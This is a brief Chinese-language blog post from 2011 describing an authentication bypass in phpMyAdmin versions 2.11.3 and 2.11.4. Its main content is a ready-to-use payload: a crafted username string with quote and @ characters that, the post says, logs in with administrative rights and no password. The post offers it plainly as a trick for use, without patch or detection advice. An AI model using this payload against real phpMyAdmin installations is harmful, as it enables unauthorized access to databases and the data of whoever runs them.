phpmyadmin使用@符号绕过登录漏洞

作者: 日期: 2011 年 12 月 30 日 发表评论 (0) 查看评论

这个漏洞好像还蛮隐秘的,今天就说下吧

影响版本:

phpmyadmin 2.11.3

phpmyadmin 2.11.4

利用方式:

直接在phpmyadmin的用户名内填入:

‘localhost’@’@”

不用填入密码,可以直接登录,管理权限哦。

 

你可能喜欢

本文标题:phpmyadmin使用@符号绕过登录漏洞
本文链接:https://www.nigesb.com/phpmyadmin-login-vul.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

网络安全, , ,
发表评论?

0 条评论。

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>